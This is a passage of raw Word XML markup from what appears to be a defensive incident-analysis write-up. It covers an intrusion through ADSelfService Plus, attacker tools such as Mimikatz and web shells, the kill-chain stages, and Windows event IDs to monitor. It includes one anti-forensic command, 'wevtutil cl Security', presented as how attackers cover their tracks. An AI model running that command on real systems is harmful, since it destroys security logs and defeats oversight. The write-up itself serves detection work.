          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4625 (login failure) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4769 (Kerberos) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Clear logs (cover tracks)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:left="1134" w:right="1134" w:gutter="0" w:header="0" w:top="1134" w:footer="0" w:bottom="1134"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:formProt w:val="false"/>
          <w:textDirection w:val="lrTb"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="code-block-viewer_Copy_3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wevtutil cl Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:left="1134" w:right="1134" w:gutter="0" w:header="0" w:top="1134" w:footer="0" w:bottom="1134"/>
          <w:formProt w:val="false"/>
          <w:textDirection w:val="lrTb"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stealth investigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Check logs without using GUI (harder to notice) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableContents"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableContents"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableContents"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>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start"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">🧪 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Attack Tools &amp; Techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Credential dumping tool used to extract passwords from memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Tactic:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Credential Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Malicious script placed on a web server to allow remote command execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Provides persistent backdoor access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Tactic:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Persistence, Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>MRU (Most Recently Used)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Stores history of user activity (e.g., RDP connections)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Attackers delete MRU entries to hide evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Tactic:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Defense Evasion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3. Key Attacker Tactics Observed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The attack followed a structured kill chain:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Exploitation of vulnerable application (ADSelfService Plus)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Use of WMIC and PowerShell for command execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Deployment of web shells in system directories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Credential Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Use of Mimikatz and registry queries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Enumeration of logs, drives, and system configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remote execution and file transfer between servers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Gathering sensitive financial and system data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Command &amp; Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Establishing proxy connections using netsh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Defense Evasion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Clearing logs, renaming files, deleting traces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4. Important Logs to Monitor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Understanding logs is critical for detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🔐 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Security Log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4624 → Successful login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4625 → Failed login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4769 → Kerberos ticket request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="709" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>System Log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:jc w:val="start"/>
        <w:rPr/>
